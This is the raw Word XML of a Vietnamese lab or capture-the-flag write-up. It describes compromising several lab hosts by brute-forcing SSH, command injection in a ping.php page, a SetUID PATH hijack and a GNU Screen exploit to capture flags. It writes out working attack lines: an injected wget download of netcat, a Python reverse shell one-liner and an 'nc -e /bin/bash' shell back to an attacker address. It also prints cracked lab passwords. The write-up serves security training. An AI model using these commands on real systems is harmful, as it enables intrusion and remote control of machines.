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b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Chuẩn bị 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3009900"/>
                <wp:effectExtent l="0" t="0" r="9525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1826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72175" cy="3009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0.25pt;height:237.0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Thấy có cổng 80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4163060"/>
                <wp:effectExtent l="0" t="0" r="9525" b="8890"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97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72175" cy="416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70.25pt;height:327.8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Ta thấy có tbao k tấn công các cổng trên =&gt; chỉ còn cổng 2222 và 110 (cổng mail)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Telnet vào cổng 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4728210"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="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27193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72175" cy="4728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70.25pt;height:372.3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Vì có thông báo là dễ nên ta dùng Bruteforce với rockyou tấn côngg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2270" cy="2876951"/>
                <wp:effectExtent l="0" t="0" r="8890" b="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19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982270" cy="2876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2.30pt;height:226.5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Ở đây dùng hydra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812800"/>
                <wp:effectExtent l="0" t="0" r="9525" b="6350"/>
                <wp:docPr id="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2916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72175" cy="81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70.25pt;height:64.0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517140"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="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34887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72175" cy="2517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70.25pt;height:198.2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=&gt; Tìm thấy mật khẩu là bobby 1985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=&gt; SSH vào và tìm kiếm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739390"/>
                <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
                <wp:docPr id="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2317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72175" cy="2739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70.25pt;height:215.7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652905"/>
                <wp:effectExtent l="0" t="0" r="9525" b="4445"/>
                <wp:docPr id="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3409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72175" cy="1652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70.25pt;height:130.1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Ta thấy có ghi là file check.sh chạy dc với quyền ng dùng my2user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68219" cy="6477904"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="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5267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868219" cy="6477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2.06pt;height:510.0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-&gt; ta thấy bob có quyền chạy cái scripts check.sh nên ta xem thử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590540"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="1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2734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72175" cy="5590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70.25pt;height:440.2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Ta kiểm tra quyền của file vì k chạy được nnhg có quyền w vì do bob tạo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20164" cy="1895740"/>
                <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                <wp:docPr id="1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70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220164" cy="1895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32.30pt;height:149.2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Sau khi cấp quyền thì đã chạy dc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4787265"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="1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2312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72175" cy="4787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70.25pt;height:376.9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0902" cy="1219370"/>
                <wp:effectExtent l="0" t="0" r="8890" b="0"/>
                <wp:docPr id="1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981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10902" cy="1219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0.31pt;height:96.0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Vì bob có thể edit nên ta thêm dòng chạy /bin/bash và chạy với quyền my2user như đã nói ở trên.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252345"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="1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812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72175" cy="2252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70.25pt;height:177.3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Ta lấy được quyền của my2user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609090"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="1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347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72175" cy="1609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70.25pt;height:126.7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Ta thấy được my2user có thể đi tới vị trí zip ở trong bin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hyperlink r:id="rId24" w:tooltip="https://gtfobins.github.io/gtfobins/zip/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="830"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gtfobins.github.io/gtfobins/zip/</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="830"/>
          </w:rPr>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">vào link này để tìm cách exploit file đấy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42278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5850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72173" cy="1422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70.25pt;height:112.0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862955"/>
                <wp:effectExtent l="0" t="0" r="9525" b="4445"/>
                <wp:docPr id="1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9789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72175" cy="5862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70.25pt;height:461.6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Lấy thành công dc flag 1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Ta gen ssh key, rồi truyền qua máy tấn công  và dùng để ssh tới mail sever</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US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820545"/>
                <wp:effectExtent l="0" t="0" r="9525" b="8255"/>
                <wp:docPr id="1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26396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72175" cy="1820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70.25pt;height:143.3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359660"/>
                <wp:effectExtent l="0" t="0" r="9525" b="2540"/>
                <wp:docPr id="1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605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72175" cy="2359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70.25pt;height:185.8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-&gt; ssh thành công qua cổng 2222, k phải dùng telnet nữa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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TẤN CÔNG WEB SEVER VÀ PHP CODE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Xem thông tin eth0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Xem trực tiếp = ifconfig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462905"/>
                <wp:effectExtent l="0" t="0" r="9525" b="4445"/>
                <wp:docPr id="2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5381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72175" cy="5462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70.25pt;height:430.1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Xem bằng netdiscover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151380"/>
                <wp:effectExtent l="0" t="0" r="9525" b="1270"/>
                <wp:docPr id="2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2378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72175" cy="2151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70.25pt;height:169.4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Dùng route –n để tìm trong banggr routing table để loại bỏ gatewway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Rồi xem 3 cổng còn lại cùng với nc =&gt; chỉ có cổng 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829300"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="2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7096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72175" cy="5829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70.25pt;height:459.0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Rồi xem 3 cổng còn lại cùng với nc =&gt; chỉ có cổng 0.3 là web sever là cổng 80</w:t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880235"/>
                <wp:effectExtent l="0" t="0" r="9525" b="5715"/>
                <wp:docPr id="2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82367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72175" cy="1880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70.25pt;height:148.0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Xem thông tinn của web -&gt; k có gì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Port forwarding vào cổng 8000 máy kali từ cổng 80 của máy nạn nhân</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US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787650"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="2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699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72175" cy="278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70.25pt;height:219.5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784985"/>
                <wp:effectExtent l="0" t="0" r="9525" b="5715"/>
                <wp:docPr id="2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8501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72175" cy="178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70.25pt;height:140.5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n-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng gobuster để lục lọi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4824729"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="2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6135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88486" cy="4837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70.25pt;height:379.9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Có file ping là đáng chú ý, truy cập thử</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr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549525"/>
                <wp:effectExtent l="0" t="0" r="9525" b="3175"/>
                <wp:docPr id="2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44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72175" cy="2549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70.25pt;height:200.7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Có tbao hdan cách truyền parameter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310005"/>
                <wp:effectExtent l="0" t="0" r="9525" b="4445"/>
                <wp:docPr id="2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488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72175" cy="1310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70.25pt;height:103.1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Thử và ra kq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Ta thử RCE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266190"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="2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565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72175" cy="1266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70.25pt;height:99.7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Tạo file sever để truyền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226820"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="3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5643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72175" cy="1226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70.25pt;height:96.6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w:t xml:space="preserve">localhost:8000/ping/ping.php?host=; wget http://172.17.0.4:9000/nc; chmod 777 nc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Truyền câu lệnh này vào để lấy file nc từ http sever ta mở ở trc và cấp quyền cho nó(full quyền)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441450"/>
                <wp:effectExtent l="0" t="0" r="9525" b="6350"/>
                <wp:docPr id="3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7924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72175" cy="144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70.25pt;height:113.5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Kiểm tra quyền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711325"/>
                <wp:effectExtent l="0" t="0" r="9525" b="3175"/>
                <wp:docPr id="3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983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72175" cy="1711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70.25pt;height:134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Xem địa chỉ curent directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br w:type="page" w:clear="all"/>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.17.0.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">",</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'</w:t>
      </w:r>
      <w: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*file nc tạo reverse shell với câu lệnh trên (giống các bài trc)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rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">http://localhost:8000/ping/ping.php?host=; /var/www/html/ping/nc 172.17.0.5 9000 -e /bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">rồi dùng câu này để chạy lấy dc bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23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Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:highlight w:val="none"/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232660"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="3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302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72175" cy="2232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70.25pt;height:175.8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Kiểm tra thấy có 2 tài khoản oscar và oliver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1902" cy="2400635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3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249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391902" cy="2400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24.56pt;height:189.03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Kiểm tra các file mà 2 tài khoản này sở hữu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Có file secret khả nghi -&gt; lấy được password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SSH vào tk oliver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486025"/>
                <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                <wp:docPr id="3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8911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72175" cy="248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70.25pt;height:195.7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Leo thang đặc quyền để lấy dc thêm tk của oscar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720215"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="3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527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72175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70.25pt;height:135.4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Lấy được thêm cả my_password của oscar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7954" cy="2829320"/>
                <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                <wp:docPr id="3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231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867954" cy="282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83.30pt;height:222.7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Đăng nhập thành công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9375" cy="1028844"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3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912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839375" cy="1028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81.05pt;height:81.0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Ls –la thì thấy có 1 file là current-date có quyền SetUID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Xem qua file current-date nó sẽ gọi tới file date – ta tiêm 1 biến date gọi tới /bin/bash và cấp full quyền cho nó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3663950"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="3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43150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72175" cy="3663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70.25pt;height:288.5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Ta chạy file script nó gọi tới date và lấy dc quyền root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77745" cy="4648849"/>
                <wp:effectExtent l="0" t="0" r="8890" b="0"/>
                <wp:docPr id="4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52779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877745" cy="4648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2.81pt;height:366.0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Tìm thấy flag thứ 2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Xem nốt cổng 0.5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Quét cổng thấy có dvu ftp server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211445"/>
                <wp:effectExtent l="0" t="0" r="9525" b="8255"/>
                <wp:docPr id="4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54051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72175" cy="5211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70.25pt;height:410.3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  <w:t xml:space="preserve">Kết nối ftp tới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7692" cy="5363323"/>
                <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                <wp:docPr id="4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827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677692" cy="5363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47.06pt;height:422.3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Ta thấy có 1 directory .folder khả nghi, xem thêm thì có file .backup.zip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58375" cy="2162477"/>
                <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                <wp:docPr id="4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0456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4658375" cy="2162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66.80pt;height:170.2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6324" cy="819264"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4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517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06324" cy="819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5.06pt;height:64.51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Dùng nc để lấy file backup này về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1527810"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="4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1505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72175" cy="1527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70.25pt;height:120.3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10320" cy="1000265"/>
                <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                <wp:docPr id="4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3022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3010320" cy="100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237.03pt;height:78.76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Unzip ra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Nhg yêu cầu password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  <w:t xml:space="preserve">Ta hash file zip r dùng john để tìm ra mk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5080635"/>
                <wp:effectExtent l="0" t="0" r="9525" b="5715"/>
                <wp:docPr id="4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610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72175" cy="5080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70.25pt;height:400.0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-&gt; mk là 1234567890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-&gt; unzip xong thì sẽ có dc tkhoan donald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87272" cy="6373114"/>
                <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                <wp:docPr id="4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8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887272" cy="6373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3.56pt;height:501.82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-&gt; SSH vào rồi xem các file hay ho</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none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4059" cy="1352739"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4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1090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544059" cy="1352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57.80pt;height:106.51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7166" cy="3296110"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5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51941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487166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32.06pt;height:259.5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  <w:t xml:space="preserve">Có screen-4.5.0, ta kiểm tra và xem trên GTFOBins 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240478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08613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72173" cy="24047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70.25pt;height:189.3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</w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:hyperlink r:id="rId61" w:tooltip="https://www.exploit-db.com/exploits/41154" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="830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GNU Screen 4.5.0 - Local Privilege Escalation - Linux local Exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tìm có 1 exploit trên exploit db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2175" cy="6806565"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:docPr id="5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671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72175" cy="6806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70.25pt;height:535.95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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Chạy file và lấy dc quyền root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4165" cy="4972744"/>
                <wp:effectExtent l="0" t="0" r="8890" b="0"/>
                <wp:docPr id="5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6399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944165" cy="4972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89.30pt;height:391.5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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; thấy cờ thứ 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:sectPr>
      <w:footnotePr/>
      <w:endnotePr/>
      <w:type w:val="continuous"/>
      <w:pgSz w:h="15840" w:orient="portrait" w:w="12240"/>
      <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1701" w:header="720" w:footer="72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Courier New">
    <w:panose1 w:val="02070309020205020404"/>
  </w:font>
  <w:font w:name="Wingdings">
    <w:panose1 w:val="05000000000000000000"/>
  </w:font>
  <w:font w:name="Calibri">
    <w:panose1 w:val="020F0502020204030204"/>
  </w:font>
  <w:font w:name="Cordia New">
    <w:panose1 w:val="020B06040202020202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"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Arial" w:cs="Arial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Arial" w:cstheme="majorHAnsi"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="vi-VN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70">
    <w:name w:val="Table Grid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1">
    <w:name w:val="Table Grid Light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2">
    <w:name w:val="Plain Table 1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3">
    <w:name w:val="Plain Table 2"/>
    <w:basedOn w:val="84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4">
    <w:name w:val="Plain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5">
    <w:name w:val="Plain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6">
    <w:name w:val="Plain Table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7">
    <w:name w:val="Grid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8">
    <w:name w:val="Grid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9">
    <w:name w:val="Grid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0">
    <w:name w:val="Grid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1">
    <w:name w:val="Grid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2">
    <w:name w:val="Grid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3">
    <w:name w:val="Grid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4">
    <w:name w:val="Grid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5">
    <w:name w:val="Grid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6">
    <w:name w:val="Grid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Grid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Grid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Grid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Grid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Grid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Grid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4 - Accent 1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4 - Accent 2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4 - Accent 3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4 - Accent 4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4 - Accent 5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4 - Accent 6"/>
    <w:basedOn w:val="84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5 Dark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5 Dark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List Table 1 Light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List Table 1 Light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List Table 1 Light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List Table 1 Light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List Table 1 Light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List Table 1 Light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List Table 1 Light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List Table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List Table 2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List Table 2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List Table 2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List Table 2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List Table 2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List Table 2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List Table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List Table 3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3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3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3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3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3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4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4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4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4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4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4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5 Dark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5 Dark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5 Dark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5 Dark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5 Dark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5 Dark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5 Dark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6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6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6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6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6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6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6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7 Colorful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7 Colorful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7 Colorful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7 Colorful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7 Colorful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7 Colorful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7 Colorful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Bordered &amp; Lined - Accent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Bordered &amp; Lined - Accent 1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Bordered &amp; Lined - Accent 2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Bordered &amp; Lined - Accent 3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Bordered &amp; Lined - Accent 4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Bordered &amp; Lined - Accent 5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Bordered &amp; Lined - Accent 6"/>
    <w:basedOn w:val="84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Bordered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Bordered - Accent 1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Bordered - Accent 2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Bordered - Accent 3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Bordered - Accent 4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Bordered - Accent 5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Bordered - Accent 6"/>
    <w:basedOn w:val="84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96">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="834"/>
    <w:next w:val="834"/>
    <w:link w:val="80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797">
    <w:name w:val="Heading 7"/>
    <w:basedOn w:val="834"/>
    <w:next w:val="834"/>
    <w:link w:val="80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798">
    <w:name w:val="Heading 8"/>
    <w:basedOn w:val="834"/>
    <w:next w:val="834"/>
    <w:link w:val="80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799">
    <w:name w:val="Heading 9"/>
    <w:basedOn w:val="834"/>
    <w:next w:val="834"/>
    <w:link w:val="80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00">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="7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01">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="79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02">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="79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03">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="79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04">
    <w:name w:val="Title"/>
    <w:basedOn w:val="834"/>
    <w:next w:val="834"/>
    <w:link w:val="80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05">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="80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06">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="834"/>
    <w:next w:val="834"/>
    <w:link w:val="80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07">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="80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08">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="834"/>
    <w:next w:val="834"/>
    <w:link w:val="80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09">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="80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10">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="840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11">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="834"/>
    <w:next w:val="834"/>
    <w:link w:val="81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12">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="81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13">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="840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14">
    <w:name w:val="No Spacing"/>
    <w:basedOn w:val="834"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="815">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="84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16">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="840"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="817">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="840"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="818">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="84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19">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="84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20">
    <w:name w:val="Header"/>
    <w:basedOn w:val="834"/>
    <w:link w:val="82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21">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="820"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="822">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="834"/>
    <w:link w:val="82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23">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="822"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="824">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="834"/>
    <w:link w:val="82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25">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="824"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="826">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="840"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="827">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="834"/>
    <w:link w:val="82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28">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="840"/>
    <w:link w:val="827"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="829">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="840"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="830">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="840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31">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="840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32">
    <w:name w:val="TOC Heading"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="833">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="834"/>
    <w:next w:val="834"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:afterAutospacing="0"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="834" w:default="1">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en" w:eastAsia="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="835">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="834"/>
    <w:next w:val="834"/>
    <w:link w:val="843"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pBdr/>
      <w:spacing w:after="30" w:before="360" w:line="360" w:lineRule="auto"/>
      <w:ind/>
      <w:contextualSpacing w:val="true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836">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="834"/>
    <w:next w:val="834"/>
    <w:link w:val="844"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pBdr/>
      <w:spacing w:before="40" w:line="360" w:lineRule="auto"/>
      <w:ind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837">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="834"/>
    <w:next w:val="834"/>
    <w:link w:val="845"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="left" w:leader="none" w:pos="284"/>
        <w:tab w:val="left" w:leader="none" w:pos="567"/>
      </w:tabs>
      <w:spacing w:after="120" w:before="120" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="567"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="838">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="834"/>
    <w:next w:val="834"/>
    <w:link w:val="846"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="120" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="567"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="839">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="834"/>
    <w:next w:val="834"/>
    <w:link w:val="847"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:pBdr/>
      <w:spacing w:before="40" w:line="288" w:lineRule="auto"/>
      <w:ind w:firstLine="567"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="1f3763" w:themeColor="accent1" w:themeShade="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="840" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
